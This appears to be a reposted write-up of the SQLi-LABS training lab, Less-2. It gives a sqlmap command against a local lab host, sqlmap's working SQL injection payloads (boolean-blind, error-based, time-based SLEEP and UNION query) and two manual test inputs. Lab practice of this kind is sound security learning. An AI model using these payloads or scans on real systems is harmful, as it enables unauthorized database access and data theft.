SQLi-LABS Page-2(Basic Challenges)
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQLi-LABS Page-2(Basic Challenges)相关的知识,希望对你有一定的参考价值。
sqlmap:
python sqlmap.py -u "http://mysqli/Less-2/?id=1"
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9029=9029
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 7263 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(7263=7263,1))),0x7170786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6666 UNION ALL SELECT NULL,NULL,CONCAT(0x71707a6b71,0x6e65656d6264666469465061554a43627450625658767a67535a5767495a79756a54685759476441,0x7170786b71)-- Vdjy
---
手动测试:
id = 1 and 1=1
id=1 and 1=2
以上是关于SQLi-LABS Page-2(Basic Challenges)的主要内容,如果未能解决你的问题,请参考以下文章
SQLi-LABS Page-4(Basic Challenges)
SQLi-LABS Page-1(Basic Challenges)
SQLi-labs Page-2_Less-29---Less-37
SQLi-labs Page-2_Less-29---Less-37